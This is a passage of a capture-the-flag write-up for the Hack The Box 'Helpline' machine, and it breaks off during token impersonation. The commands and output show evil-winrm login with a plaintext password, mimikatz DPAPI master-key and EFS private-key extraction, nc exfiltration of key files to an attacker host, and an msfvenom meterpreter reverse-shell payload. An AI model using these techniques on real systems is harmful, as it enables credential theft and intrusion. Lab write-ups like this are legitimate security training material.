User profile                 
Home directory               
Last logon                   12/29/2018 10:20:44 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users                
Global Group memberships     *None                 
The command completed successfully.

And winrm’s port is open : 
So I thought of authenticating as tolu to read the flag (I used evilwinrm)

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i helpline -u tolu -p '!zaq1234567890pl!99' -s './ps1_scripts/' -e './exe_files/'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tolu\documents> cd ..
*Evil-WinRM* PS C:\Users\tolu> cd Desktop
*Evil-WinRM* PS C:\Users\tolu\Desktop> dir

Directory: C:\Users\tolu\Desktop

Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a---- 12/20/2018 11:12 PM 32 user.txt

*Evil-WinRM* PS C:\Users\tolu\Desktop> type user.txt
Access to the path 'C:\Users\tolu\Desktop\user.txt' is denied.
At line:1 char:1
+ type user.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\tolu\Desktop\user.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\tolu\Desktop>

But I still couldn’t read the flag …

I found this guide to decrypt EFS files with mimikatz, by following it I was able to decrypt the user flag.
We need to get the certificate and decrypt the master/private keys (details in the guide mentioned above) :

mimikatz # crypto::system /file:"C:\Users\tolu\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\91EF5D08D1F7C60AA0E4CEE73E050639A6692F29" /export                                                                               
* File: 'C:\Users\tolu\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\91EF5D08D1F7C60AA0E4CEE73E050639A6692F29'                                                                                      
[0045/1] BACKED_UP_PROP_ID                                                                     00                                                                                         [0002/1] KEY_PROV_INFO_PROP_ID                                                                 Provider info:                                                                                     Key Container  : e65e6804-f9cd-4a35-b3c9-c3a72a162e4d                                       Provider       : Microsoft Enhanced Cryptographic Provider v1.0                             Provider type  : RSA_FULL (1)                                                               Type           : AT_KEYEXCHANGE (0x00000001)                                                 Flags          : 00000000                                                                   Param (todo)   : 00000000 / 00000000                                                 [0003/1] SHA1_HASH_PROP_ID
  91ef5d08d1f7c60aa0e4cee73e050639a6692f29
[0020/1] cert_file_element
  Data:
308202f9308201e1a0030201020210560e4d2b13840a9f4ef8246c32c1950f300d06092a864886f70d0101050500300f310d300b06035504031304746f6c753020170d3138313232393231323133335a180f32313138313230353231323133335a300f310d3
00b06035504031304746f6c7530820122300d06092a864886f70d01010105000382010f003082010a0282010100b661bbc3191aed3031d754ceee0cef50462a746656b973a74bed822fa31d44b8eb9ce1f165ef9f9691863b18694d0d72ddbb4ed40bc91021ef9ec7dc
977242dbab9d9124e548d7f71bfa191de5d0fd1d23de24a10958c5821adb7b89b350e5c3da17cdffdf828659dd8732f55bc7bd4f7e7c167f3f054520c34a4b280dbe0e86faae45082eeed8422549a49134b398351563c62dab70cfa3bb66d9cf07e749f3c2bc9a554a8
b2bcda9559d3f42b7b1fed755c519f26243756363efd93cae3f71aa813af0757d231a43daae5b3dc4303b330833e2db7cad6af45ab9c2b756c2de5af4f250df1c58e35bdfb3ccbc6c3be0db973faf27314413375d7b1c40dbc3310203010001a34f304d30150603551d
25040e300c060a2b0601040182370a030430290603551d1104223020a01e060a2b060104018237140203a0100c0e746f6c754048454c504c494e450030090603551d1304023000300d06092a864886f70d010105050003820101001054e49d105efb13f699ec26dd8f2
828eff46966b8b3623dafb132b287e4a4c870261bb6bec2acf8a8a648aead2b8c9daeb366d6096889ea23cba08d71b78aa9c09e92218c6bbd5b17e67910c551f0f452963d730f5b90c6be10048c1234087bcd1cdcc0f17adae55452f7f0b495414f54de59ff39f513e8
1aae5c1aa6e54beb8561aa5795cb59dddbfe528b9020d1f4d1aab1842eafbc0c0d92c75aa42ab1dd278262676a2fd5a39b526544d37cf59c2647db5efb743c78fb744be0cf41b2512c7f42dbb2949cbe359aca36b17670247b49b12c27119f7d358ca38e70c3ccebd13
c5bccc7236ae09646af07077233b49a5615cb8be05b642e09de595c89dfb9
  Saved to file: 91EF5D08D1F7C60AA0E4CEE73E050639A6692F29.der


mimikatz # dpapi::capi /in:"C:\Users\tolu\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-1011\307da0c2172e73b4af3e45a97ef0755b_86f90bf3-9d4c-47b0-bc79-380521b14c85"

**KEY (capi)**

  dwVersion          : 00000002 - 2
  dwUniqueNameLen    : 00000025 - 37
  dwSiPublicKeyLen   : 00000000 - 0
  dwSiPrivateKeyLen  : 00000000 - 0
  dwExPublicKeyLen   : 0000011c - 284
  dwExPrivateKeyLen  : 00000650 - 1616
  dwHashLen          : 00000014 - 20
  dwSiExportFlagLen  : 00000000 - 0
  dwExExportFlagLen  : 000000fc - 252
  pUniqueName        : e65e6804-f9cd-4a35-b3c9-c3a72a162e4d
  pHash              : 0000000000000000000000000000000000000000
  pSiPublicKey       :
  pSiPrivateKey      :
  pSiExportFlag      :
  pExPublicKey       : 525341310801000000080000ff0000000100010031c3db401c7b5d3713443127af3f97dbe03b6cbcccb3df5be3581cdf50f2f45adec256b7c2b95af46aad7cdbe23308333b30c43d5baeda431a237d75f03a81aa713fae3cd9ef63637543
62f219c555d7feb1b7423f9d55a9cd2b8b4a559abcc2f349e707cfd966bba3cf70ab2dc663153598b33491a4492542d8ee2e0845aefa860ebe0d284b4ac32045053f7f167c7e4fbdc75bf53287dd598682dfffcd17dac3e550b3897bdb1a82c55809a124de231dfdd0e
51d19fa1bf7d748e524919dabdb427297dcc79eef2110c90bd44ebbdd720d4d69183b8691969fef65f1e19cebb8441da32f82ed4ba773b95666742a4650ef0ceece54d73130ed1a19c3bb61b60000000000000000                                         
  pExPrivateKey      :
  **BLOB**
    dwVersion          : 00000001 - 1
    guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
    dwMasterKeyVersion : 00000001 - 1
    guidMasterKey      : {2f452fc5-c6d2-4706-a4f7-1cd6b891c017}
    dwFlags            : 00000000 - 0 ()
    dwDescriptionLen   : 0000002c - 44
    szDescription      : CryptoAPI Private Key
    algCrypt           : 00006610 - 26128 (CALG_AES_256)
    dwAlgCryptLen      : 00000100 - 256
    dwSaltLen          : 00000020 - 32
    pbSalt             : d05086dc4a0e8c37b26b9298d6e507a07e6b01495c8e874636d6555909860bfc
    dwHmacKeyLen       : 00000000 - 0
    pbHmackKey         :
    algHash            : 0000800e - 32782 (CALG_SHA_512)
    dwAlgHashLen       : 00000200 - 512
    dwHmac2KeyLen      : 00000020 - 32
    pbHmack2Key        : b7a581f4205455a35c32cf2bae9d3be3fd90990ae6f63c417e9c5a06084d04f1
    dwDataLen          : 00000550 - 1360
    pbData             : 0dd1b5843b4e6da999ab982ff7bef727bd63f11eb222fd81420d24e0dc8a8c03910ddca26dba324e943a5357776530618f14c74382062047acb3f35debdb8f885a283c3644542dde4aa1175ac9d7a23e014bb92d85c2f51dd8eb6d0007
a2f4ca83df25b59f32794c2a4e227e526cd2d5f4a222ca9c14be15e62982107d91865a3e0fc04708144aa7fe7f7baf0c5a7b99c18f96e82c1f01dc8b41df64b51befd3a978a9d47a72246ceadfda631d09be350a4d3bf1301fba7e1b6c6e0c40bf95ce9e154f79cbef2
6d7a3c00d538e490132954d4ee94619dcdaf75e64676c89e89317d4668fe4b942a7bc21371efa3adf08152dabdf0d16e608cda6bdcca193771d736e19505e51f6e972ef5da070b0023e740dd96893d0458da1994f72aa3bc6846218e4634d4a199f698dcce5d2a96c68
8bb20d8138ac743fbff1a43934bbdcff40145ebc815edaf5080d63656236aba75261d7fe0b915e393912d8fe731bb4ab232f88553918c17d95f81605fb24bb9a7527e2eda01fc088e653ce99d58143a74595d47169cf58a2308e128e3956c0c4e225b1dfa0cd8cf0307
b670977c3b62b30bd09846e993779c4471cbd0682dc9bf038bfb8daf8286c0fd4fbcdcf135cb48dc38f0d34342a0116aef4211104657c20db578d9b21b2dbe2505bccc86a48b343f0f9df63482562f86f4015e6dc327a209684049188251506a8f39ae8946a9cdec43$
bb71e7d4fac63f33932dd0bd52fa5ffd48ff11c415e856a496252378fb19c456c3e191a19621c292654af48228906eac7ae5717a77a2c616e194ea9189e77cfa0252da0180fe128fa9f3a0cd826f7530dc03428e6ecbbc7ae7bffe0ce2780b3ba686c3d73f3da55af6$
65fec2c22cbb119a698c5bbbed802d3a31fb44e395606adb58e0b0e2030910281dbeeb76bddebf2ae6862633f839324cb72a9c05a7d24acc3cdad9648be0e816039581d4eb3ddefdc1457d3175b5c776ca445bd409038b6369fa9151f6ee88ab44e9d64b40ecd09e89$
7e2b36e51c44f93bc5a985c13cc0f8d31aad776167b027c28a09943580d848af506c68a400ed93734dbe579a84837a90c6fd60d338e9e981599086da725d7e6c87f89f9a59979672a8b74c704e848fc6cac786e49a3b7f310b2839d67652a9ae3018ce6aca06f6e60b$
bcf526f859a618b32b7b112088eefccf69e873e1d62a20b416203a2428d08abe22518eecfe0a5115a82efb21d467854444b15db49e82c4442aaa045fdf4ea725295da78d14082c9140b6ea6356039b48e53fb7eb8d3ea21713c346d6ff381aaf709c5e83e7d0c5e330$
f7374caccf6312f8f36afc041fcfd89a7e93d453393c991c3887d6b98179cc254172dfd4a09c968a25dab0b53df6f38c6b22e9352d0920789920659b1cb55c61f74bccb63fc397e0997f896e55efbaf200629dd399584f1675ebe588b025ee4160387aa3a5a3239899$
75a97eddbf5dc1dbf4defb894091c851f73413e2da6d7a39e23481dcda7857311a2816d720c0da057952e2d4218b2f4f735469cc4d15324de94b7036fb072afdb708929363934351feecc27c0c81206cafaa7bd5748456799cb528773cafc4b6f6fa25c6bc617b537ac
b354b10ddeb628974ad787f792a9b2564741b1ca8538de0647ab945e25aec233b247ca228111bcdafeed17f032d7277507934895b07197e8331451cd9eff35681afc625741ff13ee1daac61e16bea787ad2b3901a52d29c75c33a31d7993ed92a70d2196109d59b817f
e6471f24540f59c95d082556d05333201a4f54c71db4d135308c5339ecf8c63258a73e71d86b7ec0f3d71b8103de2d4b886b51f9994eb2f8a62c9bb444f8e1c19096085d4a67a9a16a9b74bb2d74c0298e499260dcdedd2d1cf94ed1f2e2bf1c4a194f79a3ff1bfb17c
6a
    dwSignLen          : 00000040 - 64
    pbSign             : b3854af7c1faaa30806aa909e65813225a9aede7b0705c4c186d080ced4883b22e9a06acfb1d7762b1c69e368dcecd0de3a7e8b8f112e61cd9231ad5c5eef596                                                         

  pExExportFlag      :
  **BLOB**
    dwVersion          : 00000001 - 1
    guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
    dwMasterKeyVersion : 00000001 - 1
    guidMasterKey      : {2f452fc5-c6d2-4706-a4f7-1cd6b891c017}
    dwFlags            : 00000000 - 0 ()
    dwDescriptionLen   : 00000018 - 24
    szDescription      : Export Flag
    algCrypt           : 00006610 - 26128 (CALG_AES_256)
    dwAlgCryptLen      : 00000100 - 256
    dwSaltLen          : 00000020 - 32
    pbSalt             : 61af1a324f58c63a6bb3767357892b8c95d9a9a0dea6da062322afc39734c72a
    dwHmacKeyLen       : 00000000 - 0
    pbHmackKey         :
    algHash            : 0000800e - 32782 (CALG_SHA_512)
    dwAlgHashLen       : 00000200 - 512
    dwHmac2KeyLen      : 00000020 - 32
    pbHmack2Key        : ee6cef3310951fa86aba9b0bc3b23c237d23fbac008175bf670b68b73899e983
    dwDataLen          : 00000010 - 16
    pbData             : 3766e1ec88316997e9aeb13d847c396e
    dwSignLen          : 00000040 - 64
    pbSign             : 1d17141018652ad326ebd1a9c3030feb1356fede8002391d9fbba2d5c75221e654aef732841a04638f5577b59e63c8037ed26c7e4f6d1ed34a6244c33e631800                                                         


mimikatz # dpapi::masterkey /in:"C:\Users\tolu\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-1011\2f452fc5-c6d2-4706-a4f7-1cd6b891c017" /password:!zaq1234567890pl!99                
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {2f452fc5-c6d2-4706-a4f7-1cd6b891c017}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 80ba00dd649b0237d847b3c30d155a36
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 9dd4c16fe8fc2375858f5fdc643770d26bd55c48fec169c28d901820ebe28ea0d6845d2867e3a2bb3b763108da7fb69b5203d8a73ffb22b44d21949150546a0387e2a7d05a18b877f06d0dfe8baf89fc4029070bd5f0a5ac9cbe2379dda7facf6a2455ed8dae4dacd51b981b147ebddf12da71d4b22d675925ed576d92247aac8a39eb5080607382ecf2c3e9ea92ce2f

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : bce3d5c5463ff84017a1f9eabfb4b9ea
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 6d4e0478c22d0a52f7bc66249a0c6a7071991300dd122c4bee0aa31b72273938f336a44d08a15a2effcb2e5787069ab153e666dcd518b7af23e168577f56739f68c42e057508d7d5ffb16bf18d9e720873e644152d461d83356f500f4b8efbbcc9ee073a718134111f8b2708bf0f1645

[credhist]
  **CREDHIST INFO**
    dwVersion        : 00000003 - 3
    guid             : {0cc50e66-d2f0-43dc-97a5-5edac908aef9}


Auto SID from path seems to be: S-1-5-21-3107372852-1132949149-763516304-1011

[masterkey] with password: !zaq1234567890pl!99 (normal user)
  key : 1d0cea3fd8c42574c1a286e3938e6038d3ed370969317fb413b339f8699dcbf7f563b42b72ef45b394c61f73cc90c62076ea847f4c1e1fee3947f381d56d0f02                                                                          
  sha1: 8ece5985210c26ecf3dd9c53a38fc58478100ccb

mimikatz # dpapi::capi /in:"C:\Users\tolu\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-1011\307da0c2172e73b4af3e45a97ef0755b_86f90bf3-9d4c-47b0-bc79-380521b14c85" /masterkey:8ece5985210c26ecf3dd9c53a38fc58478100ccb            
**KEY (capi)**
  dwVersion          : 00000002 - 2
  dwUniqueNameLen    : 00000025 - 37
  dwSiPublicKeyLen   : 00000000 - 0
  dwSiPrivateKeyLen  : 00000000 - 0
  dwExPublicKeyLen   : 0000011c - 284
  dwExPrivateKeyLen  : 00000650 - 1616
  dwHashLen          : 00000014 - 20
  dwSiExportFlagLen  : 00000000 - 0
  dwExExportFlagLen  : 000000fc - 252
  pUniqueName        : e65e6804-f9cd-4a35-b3c9-c3a72a162e4d
  pHash              : 0000000000000000000000000000000000000000     
  pSiPublicKey       :    
  pSiPrivateKey      :    
  pSiExportFlag      :                        
  pExPublicKey       : 525341310801000000080000ff0000000100010031c3db401c7b5d3713443127af3f97dbe03b6cbcccb3df5be3581cdf50f2f45adec256b7c2b95af46aad7cdbe23308333b30c43d5baeda431a237d75f03a81aa713fae3cd9ef63637543
62f219c555d7feb1b7423f9d55a9cd2b8b4a559abcc2f349e707cfd966bba3cf70ab2dc663153598b33491a4492542d8ee2e0845aefa860ebe0d284b4ac32045053f7f167c7e4fbdc75bf53287dd598682dfffcd17dac3e550b3897bdb1a82c55809a124de231dfdd0e
51d19fa1bf7d748e524919dabdb427297dcc79eef2110c90bd44ebbdd720d4d69183b8691969fef65f1e19cebb8441da32f82ed4ba773b95666742a4650ef0ceece54d73130ed1a19c3bb61b60000000000000000                                          
  pExPrivateKey      :
  
  **BLOB**
    dwVersion          : 00000001 - 1
    guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
    dwMasterKeyVersion : 00000001 - 1
    guidMasterKey      : {2f452fc5-c6d2-4706-a4f7-1cd6b891c017}
    dwFlags            : 00000000 - 0 ()
    dwDescriptionLen   : 0000002c - 44
    szDescription      : CryptoAPI Private Key
    algCrypt           : 00006610 - 26128 (CALG_AES_256)
    dwAlgCryptLen      : 00000100 - 256
    dwSaltLen          : 00000020 - 32
    pbSalt             : d05086dc4a0e8c37b26b9298d6e507a07e6b01495c8e874636d6555909860bfc
    dwHmacKeyLen       : 00000000 - 0
    pbHmackKey         :
    algHash            : 0000800e - 32782 (CALG_SHA_512)
    dwAlgHashLen       : 00000200 - 512
    dwHmac2KeyLen      : 00000020 - 32
    pbHmack2Key        : b7a581f4205455a35c32cf2bae9d3be3fd90990ae6f63c417e9c5a06084d04f1
    dwDataLen          : 00000550 - 1360
    pbData             : 0dd1b5843b4e6da999ab982ff7bef727bd63f11eb222fd81420d24e0dc8a8c03910ddca26dba324e943a5357776530618f14c74382062047acb3f35debdb8f885a283c3644542dde4aa1175ac9d7a23e014bb92d85c2f51dd8eb6d0007
a2f4ca83df25b59f32794c2a4e227e526cd2d5f4a222ca9c14be15e62982107d91865a3e0fc04708144aa7fe7f7baf0c5a7b99c18f96e82c1f01dc8b41df64b51befd3a978a9d47a72246ceadfda631d09be350a4d3bf1301fba7e1b6c6e0c40bf95ce9e154f79cbef2
6d7a3c00d538e490132954d4ee94619dcdaf75e64676c89e89317d4668fe4b942a7bc21371efa3adf08152dabdf0d16e608cda6bdcca193771d736e19505e51f6e972ef5da070b0023e740dd96893d0458da1994f72aa3bc6846218e4634d4a199f698dcce5d2a96c68
8bb20d8138ac743fbff1a43934bbdcff40145ebc815edaf5080d63656236aba75261d7fe0b915e393912d8fe731bb4ab232f88553918c17d95f81605fb24bb9a7527e2eda01fc088e653ce99d58143a74595d47169cf58a2308e128e3956c0c4e225b1dfa0cd8cf030$
b670977c3b62b30bd09846e993779c4471cbd0682dc9bf038bfb8daf8286c0fd4fbcdcf135cb48dc38f0d34342a0116aef4211104657c20db578d9b21b2dbe2505bccc86a48b343f0f9df63482562f86f4015e6dc327a209684049188251506a8f39ae8946a9cdec43$
bb71e7d4fac63f33932dd0bd52fa5ffd48ff11c415e856a496252378fb19c456c3e191a19621c292654af48228906eac7ae5717a77a2c616e194ea9189e77cfa0252da0180fe128fa9f3a0cd826f7530dc03428e6ecbbc7ae7bffe0ce2780b3ba686c3d73f3da55af6$
65fec2c22cbb119a698c5bbbed802d3a31fb44e395606adb58e0b0e2030910281dbeeb76bddebf2ae6862633f839324cb72a9c05a7d24acc3cdad9648be0e816039581d4eb3ddefdc1457d3175b5c776ca445bd409038b6369fa9151f6ee88ab44e9d64b40ecd09e89$
7e2b36e51c44f93bc5a985c13cc0f8d31aad776167b027c28a09943580d848af506c68a400ed93734dbe579a84837a90c6fd60d338e9e981599086da725d7e6c87f89f9a59979672a8b74c704e848fc6cac786e49a3b7f310b2839d67652a9ae3018ce6aca06f6e60b$
bcf526f859a618b32b7b112088eefccf69e873e1d62a20b416203a2428d08abe22518eecfe0a5115a82efb21d467854444b15db49e82c4442aaa045fdf4ea725295da78d14082c9140b6ea6356039b48e53fb7eb8d3ea21713c346d6ff381aaf709c5e83e7d0c5e330f
f7374caccf6312f8f36afc041fcfd89a7e93d453393c991c3887d6b98179cc254172dfd4a09c968a25dab0b53df6f38c6b22e9352d0920789920659b1cb55c61f74bccb63fc397e0997f896e55efbaf200629dd399584f1675ebe588b025ee4160387aa3a5a3239899c
75a97eddbf5dc1dbf4defb894091c851f73413e2da6d7a39e23481dcda7857311a2816d720c0da057952e2d4218b2f4f735469cc4d15324de94b7036fb072afdb708929363934351feecc27c0c81206cafaa7bd5748456799cb528773cafc4b6f6fa25c6bc617b537ac
b354b10ddeb628974ad787f792a9b2564741b1ca8538de0647ab945e25aec233b247ca228111bcdafeed17f032d7277507934895b07197e8331451cd9eff35681afc625741ff13ee1daac61e16bea787ad2b3901a52d29c75c33a31d7993ed92a70d2196109d59b817f
e6471f24540f59c95d082556d05333201a4f54c71db4d135308c5339ecf8c63258a73e71d86b7ec0f3d71b8103de2d4b886b51f9994eb2f8a62c9bb444f8e1c19096085d4a67a9a16a9b74bb2d74c0298e499260dcdedd2d1cf94ed1f2e2bf1c4a194f79a3ff1bfb17c
6a
    dwSignLen          : 00000040 - 64
    pbSign             : b3854af7c1faaa30806aa909e65813225a9aede7b0705c4c186d080ced4883b22e9a06acfb1d7762b1c69e368dcecd0de3a7e8b8f112e61cd9231ad5c5eef596

  pExExportFlag      :
  **BLOB**
    dwVersion          : 00000001 - 1
    guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
    dwMasterKeyVersion : 00000001 - 1
    guidMasterKey      : {2f452fc5-c6d2-4706-a4f7-1cd6b891c017}
    dwFlags            : 00000000 - 0 ()
    dwDescriptionLen   : 00000018 - 24
    szDescription      : Export Flag
    algCrypt           : 00006610 - 26128 (CALG_AES_256)
    dwAlgCryptLen      : 00000100 - 256
    dwSaltLen          : 00000020 - 32
    pbSalt             : 61af1a324f58c63a6bb3767357892b8c95d9a9a0dea6da062322afc39734c72a
    dwHmacKeyLen       : 00000000 - 0
    pbHmackKey         :
    algHash            : 0000800e - 32782 (CALG_SHA_512)
    dwAlgHashLen       : 00000200 - 512
    dwHmac2KeyLen      : 00000020 - 32
    pbHmack2Key        : ee6cef3310951fa86aba9b0bc3b23c237d23fbac008175bf670b68b73899e983
    dwDataLen          : 00000010 - 16
    pbData             : 3766e1ec88316997e9aeb13d847c396e
    dwSignLen          : 00000040 - 64
    pbSign             : 1d17141018652ad326ebd1a9c3030feb1356fede8002391d9fbba2d5c75221e654aef732841a04638f5577b59e63c8037ed26c7e4f6d1ed34a6244c33e631800

Decrypting AT_EXCHANGE Export flags:
 * volatile cache: GUID:{2f452fc5-c6d2-4706-a4f7-1cd6b891c017};KeyHash:8ece5985210c26ecf3dd9c53a38fc58478100ccb                                                                                                   
 * masterkey     : 8ece5985210c26ecf3dd9c53a38fc58478100ccb
01000000
Decrypting AT_EXCHANGE Private Key:
 * volatile cache: GUID:{2f452fc5-c6d2-4706-a4f7-1cd6b891c017};KeyHash:8ece5985210c26ecf3dd9c53a38fc58478100ccb                                                                                                   
 * masterkey     : 8ece5985210c26ecf3dd9c53a38fc58478100ccb
525341320801000000080000ff0000000100010031c3db401c7b5d3713443127af3f97dbe03b6cbcccb3df5be3581cdf50f2f45adec256b7c2b95af46aad7cdbe23308333b30c43d5baeda431a237d75f03a81aa713fae3cd9ef6363754362f219c555d7feb1b7423f9
d55a9cd2b8b4a559abcc2f349e707cfd966bba3cf70ab2dc663153598b33491a4492542d8ee2e0845aefa860ebe0d284b4ac32045053f7f167c7e4fbdc75bf53287dd598682dfffcd17dac3e550b3897bdb1a82c55809a124de231dfdd0e51d19fa1bf7d748e524919d
abdb427297dcc79eef2110c90bd44ebbdd720d4d69183b8691969fef65f1e19cebb8441da32f82ed4ba773b95666742a4650ef0ceece54d73130ed1a19c3bb61b600000000000000006b686e241f8ac960bd719549bd40384959b682321394b15dd99070665bb0b3177
4d9a149b5b097b7ab965763e5592eeae40896efd89c92ef20519b995ac65c9258a8973e021efb6255514a42e5af7aa7ad028349c8ba92b61e2cb52ea740f15cdabf14f23f1aea32b3ab47c4ce72be3920314e8096fda33dd978fee18c79fde000000000d3d94b2498e1
0b913cc5c026ee19c672eaafe6eab8bb92b5c45b22be438d469a197a08b0ce230a926bf2418256c8397d5630de1ff89275cd1fa2ed1170b3408e697a505b61262a44db96763a532322a2cc070520af4f4539c4f44754513932481b76bd5765a7196cac8bf9fe9fad0d7
4460ece6677a99096b565705cc3de84cf00000000ff61d229009652074adf5045582172ff5638b61254e044b4714eb7f7261c019415a30c6e8bd1fa1d1fbc1ef0620394594d83ab2796416b80acb40ca77d7cccc1eca5eef9c6e0892e144defb31f6f3b20a69201485e
7058d72851f697307898c3957a3bb0bf0e65f1beb40b182c66627138fe5c264231d16d013bac509b9c937d00000000c7fc63389c2c563d9c380fc70de0774025d8f4a7ee15dd8c69de0ae2e5a8f881f939ade966c736ef7188374a9730ddfc99f5791d59ca8de461fbb
44a5326a29aee91d5f0eb903eb9ede3a76b03df9929b2afec0766e7dca2f4b25f4e370d95759db76a89c42812ba2c1a670a6727d8424f62c344f87dbf0b2686959335811e0e00000000505ecc240eefef332854553feabb019fa075baa1148953d142582f82d6cf1fc0
72267bd574d0d665dfafb8c9be8afd434f2250a840c6a0f80be883c70dafea4b6a1a23c29534a49188fa9c1c7df45788da79ced400db29799a057938fa3059f1ded01cbb8635dc3579ded3e9c16fc2d4bb7085ddda143c16657e24c2876c88bc00000000e1f11d6633a
644709fa252d8614531d2e8da61fc078ae8bfd91ce60582c914873d9dc6825bdd453d00594e3e286f1b843dd7154a8a67378272b2fce204162c87cb80320bd8a7e31bf646ee6b54635a4242abddef81876be6d33d9ffa356fb306c364c902ba52a43d9776d9c88d8de4
fcf11fea675cc8c1a1dcc79da2e3ec931f8fe342fecef6c883649e86cfda7d34cc01e0a128424df5d3a6f17dbea80983a6b4e14cb19c5a039b290bcdfe4c48dce945985f1c9d3464fec51b26b59d8ceacb52f5030d322566de54d42806900343b47d03ba31f67b60495
73ededc194c1be20f2a02700dc25de6e18b26d1dcc7b189c1822e6d2370c1ecc8af73e924000f2c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
        Exportable key : YES
        Key size       : 2048
        Private export : OK - 'raw_exchange_capi_0_e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.pvk'

I used nc to transfer the der and pvk files to my box :

C:\Windows\System32\spool\drivers\color>nc.exe -w 3 10.10.xx.xx 1440 < 91EF5D08D1F7C60AA0E4CEE73E050639A6692F29.der
nc.exe -w 3 10.10.xx.xx 1440 < 91EF5D08D1F7C60AA0E4CEE73E050639A6692F29.der

C:\Windows\System32\spool\drivers\color>nc.exe -w 3 10.10.xx.xx 1440 < raw_exchange_capi_0_e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.pvk        
nc.exe -w 3 10.10.xx.xx 1440 < raw_exchange_capi_0_e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.pvk

C:\Windows\System32\spool\drivers\color>
root@kali:~/Desktop/HTB/boxes/helpline/tolu# nc -lp 1440 > 91EF5D08D1F7C60AA0E4CEE73E050639A6692F29.der 
root@kali:~/Desktop/HTB/boxes/helpline/tolu# ls -la                                                                    
total 12
drwxr-xr-x 2 root root 4096 Aug 16 16:50 .
drwxr-xr-x 6 root root 4096 Aug 16 16:50 ..
-rw-r--r-- 1 root root  765 Aug 16 16:50 91EF5D08D1F7C60AA0E4CEE73E050639A6692F29.der
root@kali:~/Desktop/HTB/boxes/helpline/tolu# nc -lp 1440 > raw_exchange_capi_0_e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.pvk                                                             
root@kali:~/Desktop/HTB/boxes/helpline/tolu# ls -la                                         
total 16
drwxr-xr-x 2 root root 4096 Aug 16 16:51 .
drwxr-xr-x 6 root root 4096 Aug 16 16:50 ..
-rw-r--r-- 1 root root  765 Aug 16 16:50 91EF5D08D1F7C60AA0E4CEE73E050639A6692F29.der
-rw-r--r-- 1 root root 1196 Aug 16 16:51 raw_exchange_capi_0_e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.pvk

Then I created the pfx with openssl :

root@kali:~/Desktop/HTB/boxes/helpline/tolu# openssl x509 -inform DER -outform PEM -in 91EF5D08D1F7C60AA0E4CEE73E050639A6692F29.der -out public.pem
root@kali:~/Desktop/HTB/boxes/helpline/tolu# openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.pvk -out private.pem
writing RSA key
root@kali:~/Desktop/HTB/boxes/helpline/tolu# openssl pkcs12 -in public.pem -inkey private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

And finally I imported it and I was able to read the flag : 
I found later that I could also use Invoke-Command as tolu and I would be able to read the flag,

*Evil-WinRM* PS C:\Users\tolu\Desktop> $username = "Helpline\tolu"
*Evil-WinRM* PS C:\Users\tolu\Desktop> $password = "!zaq1234567890pl!99"
*Evil-WinRM* PS C:\Users\tolu\Desktop> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
*Evil-WinRM* PS C:\Users\tolu\Desktop> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
*Evil-WinRM* PS C:\Users\tolu\Desktop> Invoke-Command -ComputerName HELPLINE -Credential $credential -Authentication credssp -ScriptBlock { type C:\Users\tolu\Desktop\user.txt }
0d5*****8d3

We got user.


root.txt

There was a file called admin-pass.xml in C:\Users\leo\Desktop

C:\Users\leo\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D258-5C3B

 Directory of C:\Users\leo\Desktop

01/15/2019  01:21 AM    <DIR>          .
01/15/2019  01:21 AM    <DIR>          ..
01/15/2019  01:18 AM               526 admin-pass.xml
               1 File(s)            526 bytes
               2 Dir(s)   5,850,574,848 bytes free

C:\Users\leo\Desktop>type admin-pass.xml
type admin-pass.xml
Access is denied.

Only leo can read it. leo's hash was uncrackable so I looked for other ways to be leo. I wanted to see if I can impersonate leo’s token so I created a metasploit payload and got a meterpreter session.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=1441 -f exe > m.exe

And yes, I could impersonate leo’s token :

meterpreter > load incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
